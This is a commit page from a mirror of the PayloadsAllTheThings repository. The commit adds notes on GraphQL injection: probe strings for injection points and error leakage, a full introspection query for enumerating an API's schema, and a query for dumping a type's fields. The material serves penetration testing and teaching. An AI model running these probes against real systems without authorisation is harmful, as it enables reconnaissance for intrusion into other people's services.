Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-13 23:02:46 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #47 from naliferopoulos/master

Browse source 
Added GraphQL injection notes
This commit is contained in:
Swissky 2019-03-06 13:53:13 +01:00 committed by GitHub
commit f67be6ef0b
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 130 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

130
GraphQL Injection/README.md Normal file
View file

@ -0,0 +1,130 @@
# GraphQL injection
GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.
## Exploit
Identify an injection point
```
?param={__schema{types{name}}}
```
Check if errors are visible
```
?param={__schema}
?param={}
?param={thisdefinitelydoesnotexist}
```
Enumerate Database Schema with the following GraphQL query
```
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type {
...TypeRef
}
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
query IntrospectionQuery {
__schema {
queryType {
name
}
mutationType {
name
}
types {
...FullType
}
directives {
name
description
locations
args {
...InputValue
}
}
}
}
```
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
```
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
```
## References
* [Introduction to GraphQL](https://graphql.org/learn/)
* [GraphQL Introspection](https://graphql.org/learn/introspection/)